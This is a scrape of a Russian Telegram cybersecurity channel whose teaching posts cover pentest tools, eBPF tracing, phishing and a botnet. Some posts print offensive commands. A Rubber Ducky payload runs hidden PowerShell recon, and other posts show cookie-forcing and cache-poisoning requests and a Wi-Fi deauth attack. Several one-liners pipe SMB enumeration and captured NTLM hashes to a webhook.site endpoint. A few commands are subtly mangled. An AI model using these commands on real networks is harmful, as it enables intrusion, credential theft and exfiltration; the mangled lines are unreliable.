ZeroDay | Кибербезопасность – Telegram
ZeroDay | Кибербезопасность
43.2K subscribers
630 photos
7 videos
8 files
824 links
Ваш учебник по кибербезопасности

Реклама - @bashmak_media

https://telega.in/c/cybersec_academy

РКН: https://vk.cc/cHYqeq
Download Telegram
Infection Monkey: "безопасный червь", который проверяет вашу сеть лучше пентеста

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

Infection Monkey - это открытая платформа для adversary emulation, которая имитирует поведение реального malware: распространяется по сети, подбирает логины, использует уязвимости, ворует креды и отправляет отчёт на C2-сервер Monkey Island.

Monkey комбинирует техники lateral movement и реальные эксплойты: Log4Shell, RDP, SSH, SMB, WMI, слабые пароли и даже Mimikatz.

Логика простая: запускаете «ослабленный вирус», смотрите, куда он смог проникнуть, и укрепляете защиту там, где она дала сбой. Это как вакцина: безопасный патоген помогает выстроить иммунитет сети.

Установка и запуск:

# Клонируем проект
git clone https://github.com/guardicore/monkey
cd monkey

# Установка зависимостей (пример для Python-части)
pip install -r requirements.txt

# Запуск Monkey Island (C2-сервер)
docker run -p 5000:5000 guardicore/monkey-island

# Старт Infection Monkey агента
./infection_monkey --auto

# Запуск юнит-тестов
pytest

# Покрытие кода
pytest --cov-report=html --cov .


ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
1🤔134🔥3👍1
This media is not supported in your browser
VIEW IN TELEGRAM
Мониторинг Linux на уровне ядра: понятное введение в eBPF + Cilium

👋 Приветствую в мире цифровой безопасности!

Давай разберёмся, как вообще смотреть «внутрь ядра» без написания громоздких kernel-модулей. eBPF как раз про это: маленькие программы, которые запускаются внутри ядра через встроенную виртуальную машину

Вспомним, что такое eBPF: это способ перехватывать системные события (syscalls, сетевые пакеты, функции ядра), анализировать их и отправлять данные обратно в юзерспейс. Под это есть разные крючки: tracepoints, kprobes/kretprobes, uprobes и карты (maps) для обмена данными.

А теперь перехватим execve на Go через Cilium eBPF

1️⃣Создаём проект:

mkdir execve-tracer && cd execve-tracer
go mod init execve-tracer
sudo apt install clang llvm libbpf-dev
go get -t github.com/cilium/ebpf/cmd/bpf2go


2️⃣Пишем BPF-программу, которая ловит вызов execve и отправляет PID, имя процесса и запускаемый файл. Она цепляется к tracepoint:

SEC("tp/syscalls/sys_enter_execve")
int monitor_execve(struct syscalls_enter_execve_args* ctx) {
struct event evt = {};
evt.pid = bpf_get_current_pid_tgid() >> 32;
bpf_get_current_comm(evt.comm, sizeof(evt.comm));
bpf_probe_read_user_str(evt.filename, sizeof(evt.filename), ctx->filename);
bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &evt, sizeof(evt));
return 0;
}


3️⃣Go-часть: подключаемся к tracepoint, читаем события из perf-буфера и выводим в консоль:

go generate
go build -o tracer
sudo ./tracer


После запуска вы увидите каждый процесс, который выполняет execve - от bash до systemd-сервисов.

ZeroDay | #EBPF
Please open Telegram to view this post
VIEW IN TELEGRAM
9👍4
Как не отправить деньги «не туда»

👋 Приветствую в мире цифровой безопасности!

Если вы хоть раз пересылали кому‑то номер для перевода - вы уже попадали в зону риска.

А попали вы не потому, что банки небезопасные. А потому, что главный разрыв происходит между людьми, когда реквизиты гуляют по мессенджерам.

Что реально ломается: мессенджер можно обмануть. Сообщение редактируют, номер подменяют, пересылают старый, делают фишинговую визитку, а предпросмотр ссылки могут перехватить. И всё, вы переводите деньги не тому, кому хотели. Это не атаки на СБП или банк. Это атаки «по дороге» - до того, как вы вообще открыли приложение.

Почему «просто номер» не всегда безопасно: номер - это просто цифры без защиты и без проверки. Вы никак не узнаете, что тот самый реквизит, который вы вставили, настоящий, а не подменённый кем‑то в чате или в буфере обмена.

Как решают проблему: защитная фраза. Отправитель создаёт свою короткую фразу, и она показывается на каждой визитке, которую он открывает. Фраза хранится на стороне отправителя, поэтому подделать её невозможно - даже если кто‑то подсунул фейковую ссылку, визитка просто не покажет нужный маркер.

Что это даёт: вы сразу понимаете, что визитка настоящая, реквизит правильный, а путь до банка не был подменён. Фишинг, ошибки и MITM‑подмены - сильно сложнее или полностью невозможны. Деньги по‑прежнему идут напрямую через банк, сервис их даже не видит.

ZeroDay | #фишинг
Please open Telegram to view this post
VIEW IN TELEGRAM
👍86🤬1🤡1
This media is not supported in your browser
VIEW IN TELEGRAM
ХАКСЕТ .labs: практичная площадка для первых шагов в пентесте

👋 Приветствую в мире цифровой безопасности!

Ещё один инструмент, который может пригодиться тем, кто только начинает разбираться в ИБ.

Вход с нулём знаний: задачи идут от самых простых, чтобы понять базовую механику

Внутри уже 25 задач: каждая задача сопровождается видеоразбором

Живое комьюнити: где можно уточнить непонятные моменты или обсудить решение

Можно выкладывать свои задачи: это приятный бонус для тех, кто уже что-то умеет. Платформа растёт за счёт самих пользователей

ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
10🏆5🥰21😁1😍1
This media is not supported in your browser
VIEW IN TELEGRAM
3 приёма для веб‑пентеста

👋 Приветствую в мире цифровой безопасности!

Расскажу сегодня о трех полезных фишках именно для веб-пентеста.


Blind SSRF через favicon-hash: Подмена пути на /favicon.ico с редиректом на ваш сервер. Многие прокси разрешают favicon без проверки домена.
Если хэш favicon меняется, значит и SSRF-трафик точно дошёл до вас.

GET /favicon.ico HTTP/1.1
Host: internal.service


➡️Защита: строгие allowlist доменов, отключение «favicon fallback».

Cookie-forcing через незаполненные поддомены: Если у домена есть a.example.com, но нет b.example.com, вы можете поднять свой b. и выставить cookies на весь .example.com.
При следующем запросе браузер отправит ваши куки в реальное приложение, а это часто ломает auth‑логику.

Set-Cookie: session=evil; Domain=.example.com


➡️Защита: запрет wildcard‑cookie, политика Host-Only, закрытие неиспользуемых поддоменов.

Cache-Poisoning через хитрый параметр: Многие CDN кэшируют URL вроде:
/api/user?nocache=1&x=
Если добавить пустой параметр или нестандартный разделитель (;, %00), CDN кэширует вашу версию ответа, а пользователь получает поддельный контент.

/api/user?nocache=1&x=%00inject


➡️Защита: нормализация URL, запрет необычных разделителей, строгая политика кэширования.

ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
5👍5🔥2
Как ИИ-сервисы обращаются с вашими данными в 2025 году

2025-й стал годом, когда политики обработки данных у ИИ-сервисов резко поменялись. Судебное решение против OpenAI, крупные утечки вроде более миллиона записей DeepSeek и новые требования к хранению данных, всё это заставило пересмотреть представление о том, что именно происходит с запросами, которые мы отправляем в модели.

В статье очень подробный разбор, как разные вендоры (OpenAI, Anthropic, Google, DeepSeek, GigaChat, YandexGPT, OpenRouter и инструменты для кодинга) хранят данные, используют ли их для обучения, чем отличаются пользовательские и корпоративные режимы и какие были реальные инциденты в 2025 году.

ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
5👍3
❤‍🔥39🥴11👍31🤣1
USB Rubber Ducky: библиотека полезных пейлоадов

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

USB Rubber Ducky - это флешка, которая притворяется клавиатурой.
Вы вставляете её в ПК, и она мгновенно начинает вводить команды с нереальной скоростью. А официальный репозиторий usbrubberducky-payloads - это огромная библиотека готовых DuckyScript‑пейлоадов: от быстрого recon до автоматизации рутинных задач.

Пейлоады пишутся на DuckyScript 3.0: теперь это полноценный мини‑язык с функциями, циклами, режимами HID/Storage, рандомизацией, OS‑детекцией и расширениями.

Работать удобнее всего через PayloadStudio - это веб‑IDE с автокомплитом, встроенными расширениями и компиляцией в inject.bin. Написал payload.txt → собрал → вставил «утку» → получил автоматизацию уровня «вставил и ушёл».

Пример минимального пейлоада (авто‑recon):

DELAY 500
GUI r
STRING powershell -nop -w hidden
ENTER
DELAY 700
STRING whoami; ipconfig; systeminfo | Out-File C:\recon.txt
ENTER


Компиляция и загрузка

# Собрать payload через PayloadStudio
# Файл inject.bin скопировать в корень "утки"


Структура репозитория

payloads/
├── recon/
├── exfiltration/
├── remote_access/
└── privesc/
languages/
extensions/


ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
🤝76🔥2
Успеете защититься, пока киберугрозы не стали ближе?

В 2025 году хакеры используют новые схемы и находят бреши там, где ещё вчера их не было.

18 декабря эксперты F6 покажут во время вебинара, каким стал Managed XDR: какие инструменты помогут быстро обнаружить и отразить современные атаки, как работать с дорожной картой безопасности и что реально внедрять в вашей компании.

Живая демонстрация, ответы на вопросы — всё ради вашего спокойствия и контроля над ИТ-инфраструктурой.

Регистрируйтесь — количество мест ограничено!

#реклама
О рекламодателе
👻1🎃1🦄1
📝 Наглядно системная иерархия в Linux

ZeroDay | #Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
👍253🔥1😁1🍌1
Супероружие, которое взорвет интернет - ботнет AISURU

👋 Приветствую в мире цифровой безопасности!

Расскажу, почему AISURU стал настолько серьезным ботнетрм и чем он отличается от классических IoT‑ботнетов.

AISURU вырос с ~6 до ~30 Tbps за месяцы. Это уже полноценный инфраструктурный ботнет, который способен давить даже сетевые магистрали и CDN. Мощность у него распределена по тысячам подсетей, поэтому трафик выглядит как нормальный глобальный шум, что усложняет фильтрацию 😬

Рост обеспечен автоматизированной цепочкой заражений: а именно сбор свежих CVE для SOHO‑роутеров, массовые сканеры, точечная эксплуатация и самораспространение. Ботнет ставит агента поверх уязвимого фреймворка, убирает конкурентов, закрепляется в системе и сразу встраивается в общую командно‑управляющую сеть.

Внутри команды есть чёткое разделение: одни занимаются поиском багов, другие — созданием эксплойтов под новые модели оборудования, третьи - построением прокси‑цепочек и инфраструктуры управления. За счёт этого AISURU стабильно пополняет «флот» и быстро адаптируется под патчи производителей.

Технологически ботнет еще как отличается от обычных Mirai‑форков: у него есть продвинутое обнаружение honeypot‑ловушек, динамическое переключение IP‑пула, методы обхода фильтрации, а также авто‑тюнинг под конкретный DDoS‑вектор (UDP‑flood, TCP‑flood, amplification‑варианты).

Текущие цели ботнета такие: игровые платформы, облачные провайдеры, телеком‑операторы, крупные SaaS‑сервисы. Главное отличие AISURU - он продаётся как услуга, поэтому характер атак постоянно меняется: оператор подстраивает сценарий под защиту конкретной жертвы, что увеличивает эффект от атак.

ZeroDay | #история
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯146🤔3👎1🍓1🤝1
Приглашаем в канал AI Inside

Канал для тех, кто смотрит на искусственный интеллект не как на хайп, а как на рабочий инструмент. Здесь нет абстрактных теорий — только прикладные решения.

Что вас ждет:
✔️ Технологии: расскажем, как ИИ решает реальные бизнес-задачи — от автоматизации до аналитики.
✔️ Кейсы: покажем успешные примеры внедрения и использования ИИ-инструментов.
✔️ Экспертиза: объясним сложные технологии простым языком с фокусом на практическую пользу.

Наша цель — дать конкретные идеи и инсайты, которые можно применить уже сегодня.

Присоединяйтесь к сообществу практиков
6❤‍🔥2👍2🔥1💋1
This media is not supported in your browser
VIEW IN TELEGRAM
3 лайфхака для веб-пентестинга

👋 Приветствую в мире цифровой безопасности!

Расскажу о трех полезных фишках при пентесте сетевых протоколов и Wi-Fi и защите от них.


Быстрое перечисление SMB-шар без кредов + отправка результатов на webhook: собирает пользователей, шары и политики, логирует удаленно.

crackmapexec smb target.example.com –shares –users –pass-pol | curl -s -X POST https://webhook.site/your-id –data-binary @-


Wi-Fi deauth-атака с подтверждением через webhook: отключает клиентов от AP, пинг на webhook подтверждает успех (клиент reconnect’ится и триггерит).

airodump-ng wlan0mon # найди BSSID и клиент aireplay-ng -0 10 -a BSSID -c CLIENT_MAC wlan0mon && curl -s https://webhook.site/your-id -d “deauth_success=$(date)”


LLMNR/NBT-NS poisoning с захватом хэшей + webhook-лог: отравляем запросы в сети, ловим NTLM-хэши и сразу шлем на webhook для оффлайн-кракинга.

responder -I eth0 -v | grep “NTLMv2” | curl -s -X POST https://webhook.site/your-id –data-binary @-


➡️Защита: отключить SMBv1/guest, мониторить 445/139, использовать WPA3 + PMF, отключить LLMNR/NBT-NS/mDNS, предпочитать unicast DNS.

ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
6🔥3🤡2❤‍🔥1👍1
Media is too big
VIEW IN TELEGRAM
Разбираем базовые правила киберзащиты

👋 Приветствую в мире цифровой безопасности!

Поговорим о том, как компаниям защитить себя.

Самый простой способ сохранять информационную безопасность на высоком уровне — это наличие отдела кибербезопасности, который отслеживает получаемые угрозы.

Однако не всегда ресурсы компании позволяют нанять профессионалов — тогда помочь может чек-лист требований, которые обязательно нужно соблюдать, чтобы избежать успешных атак.

Составили такой список для небольшой IT-компании вместе с ИИ-помощником Гигачат. Слушайте и сохраняйте.

ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👏32🌚2❤‍🔥1🔥1
Samba в домене: где появляются скрытые точки эскалации

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу, как ресурсы Samba часто становится незаметной лазейкой внутри домена.

Частая история: Samba поднимают для обмена файлами, добавляют пару ресурсов, меняют права, и всё остаётся так навсегда. Со временем появляются папки с лишним доступом на запись, забытые тестовые директории и неправильные ACL. Именно в таких местах и начинается эскалация.

Смотрим, что реально доступно юзеру: надо обнаружить каталоги, куда неожиданно можно записывать файлы, или ресурсы, которые раскрывают структуру домена больше, чем нужно.

smbclient -L //server
smbmap -H server


Проверяем чувствительные каталоги: особенно те, где лежат скрипты, конфиги или файлы, которые используются системными сервисами. Возможность изменить такой файл превращается в скрытую точку повышения привилегий.

smbmap -H server -R /path
smbclient //server/resource


Следим за изменениями в конфигах: новые ресурсы и мелкие правки в smb.conf - частая причина появления слабых мест. Проще включить наблюдение за конфигом и фиксировать каждое изменение.

auditctl -w /etc/samba/smb.conf -p wa -k sambawatch
ausearch -k sambawatch


ZeroDay | #samba
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥31👏1
Следующий виток развития кибереза: мультиагентные атакующие системы защиты

👋Приветствую в мире цифровой безопасности!

Расскажу о ландшафте кибергуроз и способах митигации уязвимостей будущего

В 85% кибератак в мире будет задействован ИИ уже к следующему году. О том как бизнесу противостоять современным киберугрозам, рассказал в интервью «Ведомости» вице-президент по кибербезопасности Сбера Сергей Лебедь.

Более 50% компаний России уже столкнулись с атаками хакеров. Традиционно в их арсенале DDoS-атаки и вредоносное ПО, но атаки становятся все более и более мощными, в том числе благодаря ИИ. Это известное противостояние "пули и брони" в отрасли. Но что же делать?

Для дальнейшей эффективной защиты необходимо развивать ИИ в трех ключевых направлениях кибербезопасности: для автоматизации реагирования, для автоматизированной безопасной разработки, а также в рамках ассистентов и копайлотов, которые компенсируют недостаток знаний экспертов и увеличивают скорость получения и обработки данных командами (или то и другое).

Для защиты нужно разрабатывать автономные мультиагентные системы. Они уже в скором будущем станут залогом киберустойчивости. Сбер уже разработал и внедрил такую: одна ее часть — атакующая, она в близком к реальному времени режиме эксплуатирует угрозы в безопасной среде банка. Другая — защищающая, которая учится на основе этого опыта и корректирует процессы реагирования.

Для повышения уровня кибербезопасности в России в Сбере год назад открыли для отечественных компаний платформу X Threat Intelligence, к которой уже подключилось более 500 компаний страны. На платформе в течение двух часов появляется инфа о любой появившейся в мире уязвимости, а также способы ее устранения.

ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
4👏3🤣2